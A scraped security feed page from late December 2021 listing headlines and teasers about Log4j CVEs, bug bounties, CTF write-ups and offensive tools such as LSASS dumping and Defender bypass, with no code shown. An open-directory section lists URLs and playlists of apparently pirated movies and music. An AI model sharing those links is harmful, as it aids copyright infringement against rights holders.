    CTF Write-Up: Hell Yeah!
    CTF challenge available at ctf-mystiko.com.  ( 2 min )
    Story of a weird CSRF bug
    Heyyy Everyoneeee,  ( 5 min )
    Forensics — Memory Analysis with Volatility
    Recently, I’ve been learning more about memory forensics and the volatility memory analysis tool. To get some more practice, I decided to…  ( 6 min )
    Log4Shell Simplified : All you need to know about CVE-2021-44228
    Collection of all the required details to understand Log4shell (CVE-2021–44228 ) vulnerability  ( 4 min )
    TryHackme — Introduction to Django
    CTF  ( 2 min )
    Bug Bounty Tool List
    Bug Bounty Tool List Which are useful for Hunting  ( 1 min )
  • Open

    Implant.ARM.iLOBleed.a | Padvish Threats Database
    submitted by /u/dmchell [link] [comments]
  • Open

    OSINT Cheatsheet: A Mindmap for Your Investigation
    This is a guest post by Steve Hall (https://twitter.com/shall_1) Continue reading on Medium »

  • Open

    Red & Blue-Team Quick Reference Gitbooks
    ​ https://preview.redd.it/fr6me9amad881.png?width=2250&format=png&auto=webp&s=b41dfae9c724d1f9519dca8fb2317b91d4c8c778 Hi everyone! I would like to share with you one of my gitbooks, focused on DFIR, Malware and Blue-Team in general. Is a WIP in progress. Im actually adding more and more things while myself learn along the way. 📘 Hunter - Jorge Testa There you have my Red-Team version. WIP too. 📕 Tryharder - Jorge Testa Hope you like it! submitted by /u/J-Testa [link] [comments]  ( 1 min )
    Microsoft Defender for Identity security alert lateral movement playbook
    submitted by /u/dmchell [link] [comments]
  • Open

    Third Log4j RCE Vulnerability Discovered in Apache Logging Library [With Technical details & PoC]
    submitted by /u/Gorkha56 [link] [comments]
    DFIR or AppSec?
    Hi everyone, I'm currently a Computer Science student and I would love to work in cybersecurity. There are 2 roads that I want to explore and I was wondering if you could help me decide which career path to choose as I really like both of them equally: Start as a SOC Analyst and specialize in DFIR Work for a couple of years as a software engineer, after that transition to AppSec Thank you and really looking forward to your answers! submitted by /u/cyberprime24 [link] [comments]  ( 1 min )
    Most comprehensive(or better in another way) list of default creds?
    I can see there are a lot of sites that list default creds, but they seem to be missing a lot like default setting web apps. Usually it doesn't take too long to google, but not always. What are your favorite lists for this? Is it better to just google each time or have you found any gems out there? submitted by /u/Euphorinaut [link] [comments]  ( 1 min )
    "Pentesting" a friends web app, it's a bit scary..
    Hey everyone! First of all I'm not a pentester, I'd like to be one one day but for now I remain a noob who is trying harder every day. Now that thats out of the way let me start.. So I met up with a friend of mine recently who had an idea for a web app and hired a company to develop it. It's still in development but the other day he showed me the progress and asked me for my general opinion on the idea, status of the website and since he also receives regular backups of the code, he asked me to take a quick look at it. It seemed to be built on top of WordPress, nothing fancy but since I'm interested in Pentesting and Web application security I took a quick glance at interesting files like login, etc... Now again, I'm not a web dev or have great skills in php or js but I can read some o…  ( 5 min )
    Has anyone ever read Kevin Mitnick’s The Art of Invisibility? How useful was the advice?
    It’s a book released in 2017 that details how to secure your OPSEC. A lot of 5 star reviews on amazon, can anyone summarize the chapters? There were 16. submitted by /u/Original_Ad_1103 [link] [comments]  ( 3 min )
    In what fields of InfoSec is there potential for entrepreneurship?
    I am currently a high school student passionate about InfoSec studying Network+ material, and as someone who wants to own a business one day I was interested in which specific areas of this field there is startup potential. Of course, I plan on gaining plenty of experience in jobs before contributing my own innovation so your answers will allow me to calibrate my learning/career path to be more effective for my goals. submitted by /u/Connect_Estate_8617 [link] [comments]  ( 4 min )
  • Open

    New Log4j2 vulnerability
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2021-44832 Comments URL: https://news.ycombinator.com/item?id=29718845 Points: 97 # Comments: 41  ( 3 min )
    Important: Security Vulnerability CVE-2021-44832
    Article URL: https://logging.apache.org/log4j/2.x/ Comments URL: https://news.ycombinator.com/item?id=29718814 Points: 2 # Comments: 0  ( 5 min )
    Log4j Vulnerability Scanning Tool from Jfrog
    Article URL: https://github.com/jfrog/log4j-tools Comments URL: https://news.ycombinator.com/item?id=29715230 Points: 1 # Comments: 0  ( 6 min )
  • Open

    Important: Security Vulnerability CVE-2021-44832
    Article URL: https://logging.apache.org/log4j/2.x/ Comments URL: https://news.ycombinator.com/item?id=29718814 Points: 2 # Comments: 0  ( 5 min )
  • Open

    Intercepting Google CSE resources: automate Google searches with client-side generated URIs (for…
    Introduction Continue reading on Medium »  ( 11 min )
  • Open

    New Log4j CVE - CVE-2021-44832. Another JNDI RCE. Fixed in latest release.
    submitted by /u/emmainvincible [link] [comments]  ( 1 min )
    Turning bad SSRF to good SSRF: Websphere Portal
    submitted by /u/Mempodipper [link] [comments]
    IRIS - A web collaborative platform for incident response analysts allowing to share investigations at a technical level
    submitted by /u/Maijin [link] [comments]
    Pet surveillance with Falco
    submitted by /u/MiguelHzBz [link] [comments]
    Using laser speckle patterns to see keypresses etc.
    submitted by /u/anfractuosus [link] [comments]  ( 1 min )
    Integrating Canary Tokens with Microsoft Sentinel SIEM
    submitted by /u/m_rothe [link] [comments]
    PHP LFI with Nginx Assistance
    submitted by /u/dL2Hj4wR [link] [comments]  ( 1 min )
    V8 Heap pwn and /dev/memes - WebOS Root LPE
    submitted by /u/DavidBuchanan [link] [comments]
    Encoding.Tools (alternative to CyberChef and Burp Suite Encoder)
    submitted by /u/mehaase [link] [comments]
  • Open

    Hack Us Will You?
    Delorians, Continue reading on Medium »  ( 1 min )
    Astroport Boosts Bug Bounty to $3m, Takes Top Leaderboard Spot
    Astroport has just doubled its critical bug bounty reward from $1.5m to $3m, making it the largest bounty on Immunefi’s platform, beating… Continue reading on Immunefi »  ( 1 min )
    Hunting for Bugs in File Upload Feature:
    In this blog, I will be listing down some file upload Vulnerability such RCE, SSRF, CSRF, XSS and many more such vulnerabilities. Continue reading on Medium »  ( 4 min )
    SSRF in Align Technology, Inc.
    Hi everyone Align Technology, Inc. is a manufacturer of 3D digital scanners and the Invisalign clear aligners used in orthodontics.It is… Continue reading on Medium »  ( 1 min )
    [Campaign] — HappyLand testnet invitation!
    HappyLand Testnet will arrive at the end of December and we are super thrilled to welcome you. This is an opportunity to let you imagine… Continue reading on Medium »  ( 2 min )
    Bypassing HttpOnly with phpinfo file
    While doing Web Application assessment with Higgsx, We found stored Cross-Site Scripting(XSS) which was a nice finding but we could not… Continue reading on Medium »  ( 1 min )
    CVE-2021–38314 Leads to Sensitive Information Disclosure
    Hello Hackers! Continue reading on Medium »  ( 1 min )
    How having a student mail can help you in Info-sec.
    Hello Everyone, I’m Vishal & It’s my first ever blog . So if you found any grammatical error or something missing don’t pardon me, Instead… Continue reading on Medium »  ( 5 min )
    Bounty Evaluation GitHub = $15,000 US Dollars | Rate Limit
    I found the bug on GitHub website where, I bypassed the login authentication. In this walk through I will show it was done. Let’s… Continue reading on Medium »  ( 2 min )
    Bug Report Update!
    We are very grateful for the overwhelming support our community has shown for our ongoing testnet & bugbounty programme. Our bugbounty… Continue reading on Medium »  ( 2 min )
    Bug Bounty Programs for Blockchain Projects
    The list of methods and strategies applied by hackers to compromise the security of their targets is constantly expanding and they… Continue reading on Medium »  ( 2 min )
  • Open

    SecWiki News 2021-12-28 Review
    连载:演化的高级威胁治理(四) by ourren 连载:演化的高级威胁治理(三) by ourren 连载:演化的高级威胁治理(二) by ourren 连载:演化的高级威胁治理(一) by ourren SecWiki周刊(第408期) by ourren 透明度PK国家安全?美国的VEP政策改革呼声再起 by ourren 漏洞披露是一个抗解问题--协同漏洞披露(CVD)简述 by ourren THINE:针对时序异质信息网络的表示学习 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2021-12-28 Review
    连载:演化的高级威胁治理(四) by ourren 连载:演化的高级威胁治理(三) by ourren 连载:演化的高级威胁治理(二) by ourren 连载:演化的高级威胁治理(一) by ourren SecWiki周刊(第408期) by ourren 透明度PK国家安全?美国的VEP政策改革呼声再起 by ourren 漏洞披露是一个抗解问题--协同漏洞披露(CVD)简述 by ourren THINE:针对时序异质信息网络的表示学习 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Dell Driver EoP (CVE-2021-21551)
    submitted by /u/nanabingies [link] [comments]
  • Open

    【安全通报】Auerswald COMpact 5500R PBX 固件多个后门漏...
    近日,RedTeam Pentesting 公布了 Auerswald COMpact 5500R PBX 固件中的多个后门漏洞。攻击者可通过这些后...  ( 1 min )
    【安全通报】Apache APISIX Dashboard 身份验证绕过漏洞(C...
    近日,网络上出现 Apache APISIX Dashboard 身份验证绕过漏洞,攻击者可通过该漏洞绕过身份验证过程并通过...  ( 1 min )
  • Open

    【安全通报】Auerswald COMpact 5500R PBX 固件多个后门漏...
    近日,RedTeam Pentesting 公布了 Auerswald COMpact 5500R PBX 固件中的多个后门漏洞。攻击者可通过这些后...  ( 1 min )
    【安全通报】Apache APISIX Dashboard 身份验证绕过漏洞(C...
    近日,网络上出现 Apache APISIX Dashboard 身份验证绕过漏洞,攻击者可通过该漏洞绕过身份验证过程并通过...  ( 1 min )
  • Open

    企业级国产免费蜜罐HFish内测版先览
    有幸从HFish产品小姐姐那儿获得了内测资格,和大家分享一下个人使用心得,以及部分落地方法。结尾有彩蛋哟。  ( 1 min )
    告别脚本小子系列丨JAVA安全(1)——JAVA本地调试和远程调试技巧
    首期系列课程主要分享关于java安全相关内容  ( 1 min )
    【原创】VulnHub靶机实战:CyNix: 1
    VulnHub靶机实战:CyNix: 1  ( 1 min )
    全球最大图片服务公司遭勒索攻击、《蜘蛛侠》新片盗版包含挖矿木马|12月28日全球网络安全热点
    &lt;section&gt;&lt;img src=&quot;https://image.3001.net/images/20211228/1640679742_61cac93e5aadba5c4e4ea.jpg!small  ( 1 min )
    阿尔巴尼亚总理就数据泄露致歉
    在数十万阿尔巴尼亚公民的个人数据在互联网上泄露后,阿尔巴尼亚总理就此事公开道歉。
    Apache HTTP Server 2.4.52 发布,修复关键漏洞
    建议用户和管理员查看 Apache 公告,并尽快更新他们的版本,以免遭受不必要的潜在攻击。  ( 1 min )
    FreeBuf早报 | 近七成网民感到被算法算计;阿尔巴尼亚总理就数据泄露致歉
    北大互联网发展研究中心发布的《中国公众“大安全”感知报告》显示,近七成公众表示担心账号和个人信息泄露。  ( 1 min )
    威联通NAS设备在圣诞期间遭到了勒索攻击
    eCh0raix 勒索软件攻击者似乎都在系统管理员组中创建了一个账号,从而加密NAS 系统上的所有文件。  ( 1 min )
    物流巨头DW Morgan暴露了100 GB 客户数据
    Website Planet安全团队发现了一个配置错误的亚马逊S3“存储池”,池中包含约250万个文件,大小超过100GB。  ( 1 min )
    全球最大图片服务公司Shutterfly遭Conti 勒索软件攻击
    Shutterfly成立于1999年,并声称自己的在线图片存储是世界上最大的,拥有70PB的数据,约16亿张图片。  ( 1 min )
    Unity游戏反破解之道:代码破解与资源窃取,从攻击风险入手
    本文将重点围绕“反破解”讲述这些安全风险以及如何对unity游戏进行全方位的矩阵化保护升级。  ( 1 min )
    API声明文件Swagger Injection攻击
    开发者应将API声明文件视作不可信输入源对待,并在自动化代码生成环节添加相应的安全管控手段。  ( 1 min )
    基于free5gc+UERANSIM的5G SMF及UPF 网元安全需求分析
    本文对《3GPP安全保障规范(SCAS)》中定义的SMF和UPF网元安全需求进行了报文和代码分析。  ( 6 min )
  • Open

    Looking back at 2021 in cybersecurity with Netsparker
    As 2021 draws to a close, it is time for our customary round-up of the year’s most popular and relevant posts on the Netsparker blog, with a sprinkling of last-minute news and predictions for the coming year. READ MORE  ( 4 min )
  • Open

    How I Bypassed Netflix Profile Lock?
    Hi hackers,  ( 3 min )
    Analysis of Poetrat malware
    Hashes  ( 3 min )
    TryHackme LFI Writeup
    How to find and exploit LFI  ( 3 min )
    How I hacked into one of India’s biggest online book stores(RCE and more)
    This article is going to be about how I found my 1st RCE on one of India’s biggest e-commerce sites(+ a few more bugs).  ( 5 min )
  • Open

    How I Bypassed Netflix Profile Lock?
    Hi hackers,  ( 3 min )
    Analysis of Poetrat malware
    Hashes  ( 3 min )
    TryHackme LFI Writeup
    How to find and exploit LFI  ( 3 min )
    How I hacked into one of India’s biggest online book stores(RCE and more)
    This article is going to be about how I found my 1st RCE on one of India’s biggest e-commerce sites(+ a few more bugs).  ( 5 min )
  • Open

    How I Bypassed Netflix Profile Lock?
    Hi hackers,  ( 3 min )
    Analysis of Poetrat malware
    Hashes  ( 3 min )
    TryHackme LFI Writeup
    How to find and exploit LFI  ( 3 min )
    How I hacked into one of India’s biggest online book stores(RCE and more)
    This article is going to be about how I found my 1st RCE on one of India’s biggest e-commerce sites(+ a few more bugs).  ( 5 min )
  • Open

    google drive movie link
    [ Removed by reddit in response to a copyright notice. ] submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    186 persiangig OD Sites Potential NSFW
    http://aailaar.persiangig.com/ http://aamiri.persiangig.com/ http://agrandsimanmag.persiangig.com/ http://ahd666.persiangig.com/ http://albus.persiangig.com/ http://alexpk.persiangig.com/ http://alham.persiangig.com/ http://alishahbazi.persiangig.com/ http://alisharghi.persiangig.com/ http://alma85.persiangig.com/ http://aminatabak.persiangig.com/ http://aminnice.persiangig.com/ http://amir1410.persiangig.com/ http://amirsaman.persiangig.com/ http://amomasoud.persiangig.com/ http://aroonsat.persiangig.com/ http://arshiya.persiangig.com/ http://ascut3.persiangig.com/ http://ashinaazar.persiangig.com/ http://askari56.persiangig.com/ http://azarnoosh.persiangig.com/ http://azg198.persiangig.com/ http://baroun82.persiangig.com/ http://baxe0181.persiangig.com/ http://ben…

  • Open

    Windows resolves/"connects" to external IP even without internet access?
    I was poking around in my router the other day and found something I can't really understand: my Windows machine tried to connect to an external IP address (13.?.?.?) when there was no internet access and no DNS. My modem's internet cable was disconnected and both modem and router were rebooted before I powered up the Windows machine. All DNS caches should be empty. The router connections page shows 1 connection from my Windows machine to 13.?.?.? with status SYN_SENT. Of course, it didn't connect, but how did it know what external IP to try without DNS? The IP is a Microsoft one but I didn't write down what it was (and I didn't save search history) since I initially didn't think it was strange. I tried repeating the same thing several times, but never saw anymore external IPs (but a bunch of 198.x.x.x which is what I'd expect when internet is down). The only difference the first time is that it was installing a previously downloaded Windows update. Is this unusual? Is MS known to go directly to IP addresses like this? This machine only has Windows installed and drivers from Windows Update, so not much on here. submitted by /u/Vivid-Elk-8337 [link] [comments]  ( 2 min )
    Linux servers security
    Hi, We have 100+ Linux servers running with apache/tomcat and Nginx, and a few servers are public-facing with ip control. I am trying to see if any open source tool to scan all 100+ servers on a daily basis and report if any vulnerabilities. Thanks. submitted by /u/Prestigious-Yam-3510 [link] [comments]  ( 1 min )
    Best IT backgrounds to prepare for InfoSec
    I am currently a computer science student and I want to pursue a career in cybersecurity but I know that in order to get into security I will need some kind of experience before I can get a job in the field. I'm just wondering what are the best IT backgrounds to have or things that I should focus on that would help me develop skills needed for security careers. I know it depends on what kind of focus I want in security and for now I'm thinking more towards the defensive side like engineer maybe but I would prefer having answers based in either roles (attack and defense). So to rephrase it a bit better I wanna know what are the best tenporary jobs that I could do to develop skills needed to switch into security (soft dev, web dev, data sci, etc...)? submitted by /u/iTsObserv [link] [comments]  ( 7 min )
  • Open

    Playing around COM objects - PART 1
    submitted by /u/dmchell [link] [comments]
    Dumping LSASS with Duplicated Handles
    submitted by /u/dmchell [link] [comments]
    snovvcrash/NimHollow: Nim implementation of Process Hollowing using syscalls (PoC)
    submitted by /u/dmchell [link] [comments]
  • Open

    Winning the Impossible Race – An Unintended Solution for Includer’s Revenge / Counter (hxp 2021)
    submitted by /u/Caustic66 [link] [comments]
    remote Chaos Computer Congress Streaming
    submitted by /u/mubix [link] [comments]
    A Deep Dive into DoubleFeature: Equation Group's Post-Exploitation Dashboard
    submitted by /u/Megabeets [link] [comments]
  • Open

    Why did my last movie post dissappear?
    submitted by /u/International_Milk_1 [link] [comments]
    If you'll allow me-for movie or tv show fans.
    There might be one person out there who doesn't know this. So let's say you download a movie, expecting it to be in the english language, but find that Harrison Ford is speaking Persian, and it doesn't even sound like Mr F In whatever player you use, go to the audio option , and check if there is alternative track. To make sure there is an english language track, before downloading, copy the link of the movie/tv episode, and open in your player. Then you can check before downloading. submitted by /u/International_Milk_1 [link] [comments]  ( 2 min )
    I'd like to make a motion for a couple of new flairs: "Junk Science" and "Conspiracy"
    submitted by /u/brother_p [link] [comments]  ( 1 min )
  • Open

    Ethical Hacking Roadmap and Resources
    Checklist for the things that one has to learn while learning Linux: Shell, Navigation, File System, Redirection, Permissions, Processes… Continue reading on Medium »  ( 4 min )
    Full account takeover vulnerability in Minecraft
    Continue reading on Medium »  ( 2 min )
    VULNERABILIDADES WEB 7.0
    C R O S S - S I T E S SCRIPTING Continue reading on Medium »  ( 6 min )
    OSINT Research With Recon-ng
    This piece goes over the basics of Recon-ng and how to use it to facilitate OSINT research! I’ll be covering two modules: google_site_web… Continue reading on Medium »  ( 4 min )
    Unlucky Story, Judge Duplicate, and Only Get a Thank You. But It makes Me smile.
    This is from my local bounty program in my country, Indonesia. I found some vulnerabilities in an e-commerce website and I think it would… Continue reading on Medium »  ( 1 min )
    From Simple Recon to Reflected XSS
    whoami Continue reading on Medium »  ( 2 min )
    How I Bypassed Netflix Profile Lock?
    Hi hackers, Continue reading on InfoSec Write-ups »  ( 2 min )
    HOW I GOT MY SECOND SWAG
    Hi everyone! Hope you all are doing good. In this article i am going to show you how i got my second swag from Ivanti by reporting an open… Continue reading on Medium »  ( 2 min )
    DOM Based XSS
    DOM based XSS (cross site scripting) is a client side vulnerability that arises when the javascript takes data from user controllable… Continue reading on Medium »  ( 3 min )
  • Open

    Help with Autopsy on Mac
    Hi, I need to use Autopsy to analyse an E01 image for my project but am struggling to get in set up on my Mac (running Mojave). I downloaded the .zip file from autopsy and have all the files but can't seem to get the GUI running. I installed it via 'brew' but at the end of the install it said error Xcode version too low. So I don't know if it has installed properly. Any help would be appreciated. ​ Thanks submitted by /u/UserNo007 [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2021-12-27 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2021-12-27 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    OSINT Research With Recon-ng
    This piece goes over the basics of Recon-ng and how to use it to facilitate OSINT research! I’ll be covering two modules: google_site_web… Continue reading on Medium »  ( 4 min )
    TryHackMe: OhSINT — WriteUp
    Is your information safe enough on internet? Continue reading on Medium »  ( 4 min )
    OSINT Series … Part-1
    What is OSINT ? Continue reading on Medium »  ( 2 min )
  • Open

    FreeBuf早报 | 育碧被曝删除不活跃付费玩家账号;白宫邀厂商商讨加强开源安全
    一位匿名发现其育碧平台的游戏账号被删除,他邮箱曾收到一封警告信,要求他在 30 天内登录账号否则永久删除账号。  ( 1 min )
    多方围剿,老赖现形:一场与反催收黑产的持久战争
    金融行业一场旷日持久的反催收黑产战争,终于行至水深处。  ( 1 min )
    中央网信办发布《“十四五”国家信息化规划》
    《规划》是“十四五”国家规划体系的重要组成部分,是指导“十四五”期间各地区、各部门信息化工作的行动指南。
    工信部、国家标准委联合印发《工业互联网综合标准化体系建设指南(2021版)》
    《建设指南》提出,到2023年,工业互联网标准体系持续完善,制定术语定义、通用需求、供应链/产业链、人才等基础共性标准15项以上。
    广州市国资委监管企业数据安全合规管理指南(试行2021年版)》发布
    《指南》细化完善了上位法要求,成为地方国资监管部门首部针对数据合规专项领域的合规操作指南。
    易盾SaaS系统资损防控体系建设
    业务安全主要是提供认证类的服务,包括验证码,号码日志,信息认证。移动安全是通过加固和其他手段保护客户的应用,防止被逆向破解。  ( 1 min )
    谁动了我的打印机?
    到2021年10月,问题开始变得严重起来,大量安装了10月补丁的Windows 10用户发现他们不能正常的使用网络打印机了。  ( 1 min )
    Token机制相对于Cookie机制的优势
    我们大家在客户端频繁向服务端请求数据时,服务端就会频繁的去数据库查询用户名和密码并进行对比,判断用户名和密码正确与否,并作出相应提示,也就是在这样的背景下Token便应运而生。 简单  ( 1 min )
    Web应用攻击激增,该保护 API 了!
    自2019年10月以来,针对英国企业的Web应用攻击增加了251%。  ( 1 min )
    技术分享 | 常见的DDoS攻击类型及防御措施
    DDoS攻击将呈现高频次、高增长、大流量等特点,对网络安全的威胁也会与日俱增,因此做好DDoS攻击的防护工作已是刻不容缓。  ( 1 min )
    勒索软件或成2022年最大威胁、法国IT服务公司遭勒索攻击|12月27日全球网络安全热点
    安全专家发现了一种通过虚假Google Play商店页面传播的新型银行木马。陌生人假装展示某知名银行的应用程序。  ( 1 min )
    网上的“考勤打卡神器”,其实是黑灰产作弊工具
    网上的“考勤打卡神器”虽然能够解决部分从业者打卡的“烦恼”,但这是一种虚假考勤行为,是一种职场失信。
    专家详述 macOS 漏洞 :可让恶意软件绕过安全门卫
    问题的根源在于基于脚本的未签名、未公证的应用程序,无法明确指定解释器,从而导致其完美绕过。  ( 1 min )
    使用量增长了 46%,更加注重隐私的搜索引擎DuckDuckGo发展迅速
    以隐私为重点的搜索引擎 DuckDuckGo在2021年继续快速增长,目前平均每天有超过 1 亿次的搜索查询。  ( 1 min )
    从网络安全到云服务,天融信以安全助力云计算产业发展
    天融信以融合思维自研云产品,用安全助力云计算产业发展。
    搜索引擎你真的会用吗?学会这几个高级语法让你事半功倍
    本文介绍了几个常用的搜索引擎高级语法,熟练掌握将助你信息检索事半功倍,效率大大提高。  ( 1 min )
    Gartner 发布2022年新兴技术和趋势影响力雷达图中五项具有影响力的技术
    今年的新兴技术和趋势影响力雷达图包含23项最有可能给市场带来变革和转型的新兴趋势和技术。
    从零到一带你深入 log4j2 Jndi RCE CVE-2021-44228漏洞
    通过介绍ava日志体系,分析log4j2源码,带你深入本次互联网重磅“核弹”漏洞。  ( 2 min )
  • Open

    How Intrusion Prevention Systems (IPS) Work in Firewall
    Intrusion prevention and the firewall are part of Network Threat Protection. As of version 14, Network Threat Protection and Memory…  ( 5 min )
    Backdoor: HackTheBox Walkthrough
    Welcome back! Today we are going to solve another machine from HacktheBox. The box is listed as an easy box. Just add backdoor.htb in… Continue reading on InfoSec Write-ups »  ( 5 min )
  • Open

    How Intrusion Prevention Systems (IPS) Work in Firewall
    Intrusion prevention and the firewall are part of Network Threat Protection. As of version 14, Network Threat Protection and Memory…  ( 5 min )
    Backdoor: HackTheBox Walkthrough
    Welcome back! Today we are going to solve another machine from HacktheBox. The box is listed as an easy box. Just add backdoor.htb in… Continue reading on InfoSec Write-ups »  ( 5 min )
  • Open

    How Intrusion Prevention Systems (IPS) Work in Firewall
    Intrusion prevention and the firewall are part of Network Threat Protection. As of version 14, Network Threat Protection and Memory…  ( 5 min )
    Backdoor: HackTheBox Walkthrough
    Welcome back! Today we are going to solve another machine from HacktheBox. The box is listed as an easy box. Just add backdoor.htb in… Continue reading on InfoSec Write-ups »  ( 5 min )
  • Open

    Untitled
    VK.com disclosed a bug submitted by azimoff: https://hackerone.com/reports/1300583 - Bounty: $300
    Bot setting information leakage in OpenChat room
    LINE disclosed a bug submitted by akichia: https://hackerone.com/reports/1305432 - Bounty: $200
    Access to images and videos in drafts on LINE BLOG
    LINE disclosed a bug submitted by akichia: https://hackerone.com/reports/1290170 - Bounty: $780
    Missing authentication in buddy group API of LINE TIMELINE
    LINE disclosed a bug submitted by e26174222: https://hackerone.com/reports/1283938 - Bounty: $3000
    See drafts and post articles if the account owner hasn't set password (livedoor CMS plugin)
    LINE disclosed a bug submitted by akichia: https://hackerone.com/reports/1278881 - Bounty: $1300
    Missing ownership check in 2FA for secondary client login
    LINE disclosed a bug submitted by shi0n: https://hackerone.com/reports/1250474 - Bounty: $7500
    Developer uploaded files missing authentication on LINE GAME Developers site(gdc.game.line.me)
    LINE disclosed a bug submitted by tosun: https://hackerone.com/reports/969605 - Bounty: $1000
    Password reset by malicious input on air.line.me
    LINE disclosed a bug submitted by tosun: https://hackerone.com/reports/968742 - Bounty: $500
    LINE Profile ID leaks in OpenChat
    LINE disclosed a bug submitted by 66ed3gs: https://hackerone.com/reports/927338 - Bounty: $3000

  • Open

    ZAP의 새로운 Import/Export Addon, 그리고 미래에 대한 뇌피셜
    최근에 ZAP 내 여러가지 Import, Save 관련 기능들이 “Import/Export"란 이름의 새로운 Addon으로 통합되었습니다. 사용자 Interface 상에선 변화가 없어서 크게 달라진 건 없지만 이를 통해 앞으로의 ZAP에서 Import/Export 기능에 대한 방향성을 엿볼 수 있어서 글로 작성해봅니다 😎 Import files containing URLs Log File Importer Save Raw Message Save XML Message 새로 추가된 Import/Export의 실제 Addon 이름은 exim입니다. EXIM은 EXport & IMport의 약자로 웹에서도 동일한 의미로 많이 쓰이는 말입니다. ZAP의 Addon은 API를 제공하도록 어느정도 강제하고 있는 사항이라 exim도 API로 제공되고 있습니다.
    Web Cache 취약점들을 스캐닝하자 🔭
    Web Cache Poisoning, Web Cache Deception 등 Web Cache 관련 취약점은 나름 오래된 기법이지만 요 몇 년 사이 알비노왁스(@albinowax) 등 Portswigger의 연구원들에 의해 빠르게 발전한 것 같습니다. 이러한 취약점들은 여러가지 테스팅 방법을 통해서 식별하고 Exploit 하지만 이전까진 크게 강력하다고 생각하던 도구가 없었던 상태입니다. (그나마 burpsuite의 내장 스캐너가 있겠네요…) 오늘은 Web Cache 취약점을 빠르게 식별할 수 있는 좋은 도구가 있어서 공유할까합니다! 사실 제가 관련 도구를 올 여름(21년 6월쯤?) 정도부터 아주 천천히 만들고 있었는데, Hackmanit에서 선수를 처버렸네요.
  • Open

    Various stuff - mostly photos
    submitted by /u/Pleasant_Jelly_8397 [link] [comments]
    Music
    submitted by /u/International_Milk_1 [link] [comments]
    A nice list of movies, and older tv series such as Mannix
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    1.19TB of documentaries, many with subtitles (repost from January 2019)
    submitted by /u/Throw10111021 [link] [comments]  ( 1 min )
    "Poetry for the Beat Generation" plus some jazz albums (flac)
    Finally found "Poetry for the Beat Generation" with Allen on piano and Kerouac reciting http://109.120.203.163/Music/Acid%20jazz/ submitted by /u/SexRevolutionnow [link] [comments]
    Music which was pasted before, but at different link
    submitted by /u/International_Milk_1 [link] [comments]
    Movies and tv shows. But it's a mixture of those which are dubbed in persian/iranian with no english audio option, and those with english language soundtrack and persian/iranian subs. But subs can be turned off. Speed is so so I guess.
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    XPSF VLC Playlist of movies I found here
    Please delete if not allowed Hi guys, awhile ago I made a quick and easy browser tool to convert links into a VLC Playlist, you might be wondering why I opted out of M3U playlists, honestly for future expansion, m3u playlists tend to be pretty simple on the SPEC, can't define much, while XPSF allows for things like duration setting. It is a goal to rewrite this eventually and figure out a way of showing the duration, probably using an API of some kind. (my tool: https://csmit195.github.io/Links-to-XSPF-Web-App/) I have two files, one is 14.1k movies, and the other is 4.1k movies. My PC is fairly fast and loading the 14.1k movies took about 3mins, while the 4.1k only takes 10secs. Please test carefully with the 14.1k, some PC's might fail to load it, vlc could crash b4 finish loading. Downloads: note: the top 1.1k movies of both files are more popular than the ones below it 14.1K Movies (4.1K Movies from below included) https://drive.google.com/file/d/1gSjguuPTTyP_2oVktKD_YqbaAZStpEu4/view?usp=sharing 4.1K Movies https://drive.google.com/file/d/1dSb3d_CDbsvR7UO8nnnDBdYmJmsuBPv2/view?usp=sharing If you want more or have a really good source of direct movie links, feel free to lmk and I'll create more playlists. For now, enjoy and would love feedback (please no code reviews, I made it quickly so I can achieve this goal, wasn't really built for production, I'd love to optimise it in the future tho. Cheers, Chris submitted by /u/csmit195 [link] [comments]  ( 2 min )
  • Open

    A capability-safe language would have minimized the Log4j vulnerability
    Article URL: https://justinpombrio.net/2021/12/26/preventing-log4j-with-capabilities.html Comments URL: https://news.ycombinator.com/item?id=29696318 Points: 94 # Comments: 142  ( 6 min )
  • Open

    Abeats Bounty Program
    Aiming to test the website's usability, the bounty program is ideal for gathering engagement from the community and finding the necessary… Continue reading on Medium »  ( 1 min )
    CVE-2021–40579
    Insecure direct object references (IDOR) Continue reading on Medium »  ( 1 min )
    Passive Information Gathering for Pentesting
    Information gathering very important for pentester. Continue reading on Medium »  ( 2 min )
  • Open

    How do I start with Netsec ?
    I am currently enrolled in a computer science degree and, asked myself what I want to do with it. I often found myself at one filed, Security. However I have no clue on how or where to start learning more about the field. For example I find pentesting especially interesting and searched for ways to get into the field. I found two ideolegies for that, one being hands on experience and the other being strong basics. However that only gave me more questions. First: what is "Hands-on experience" ? Do I have to hack my own laptop or crack my neighbors Wifi password? Or is it much simpler to get experience? Second: Basics of what? How a computer works? The different protocols of the internet? And also, how do I get strong basics ? Where do I even start? submitted by /u/CallMeNepNep [link] [comments]  ( 2 min )
  • Open

    SecWiki News 2021-12-26 Review
    gosint开源 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2021-12-26 Review
    gosint开源 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Cracked5pider/KaynLdr: KaynLdr is a Reflective Loader written in C/ASM
    submitted by /u/dmchell [link] [comments]
  • Open

    FreeBuf早报 | 部分App禁止全部权限仍可获取用户信息;《蜘蛛侠》盗版资源内含恶意程序
    《蜘蛛侠:英雄无归》的一些盗版资源包含挂马或者捆绑恶意软件,甚至还有夹杂挖矿程序。  ( 1 min )
  • Open

    Advent of Cyber 3 Day 16 - Ransomware Madness Walkthrough
    You are the responding intelligence officer on the hunt for more information about the infamous “Grinch Enterprises” ransomware gang.  As… Continue reading on Medium »  ( 2 min )
    Log4Shell — You should know about it.
    Hello everyone! Continue reading on Medium »
  • Open

    What is a Watering Hole Attacks and How to Prevent Them
    submitted by /u/bee925p [link] [comments]  ( 1 min )
  • Open

    CTF Write-Up: Ether
    CTF challenge available at ctf-mystiko.com. Continue reading on Medium »  ( 1 min )
  • Open

    CTF Write-Up: Ether
    CTF challenge available at ctf-mystiko.com. Continue reading on Medium »  ( 1 min )
  • Open

    Weaponize JScript to bypass Windows Defender
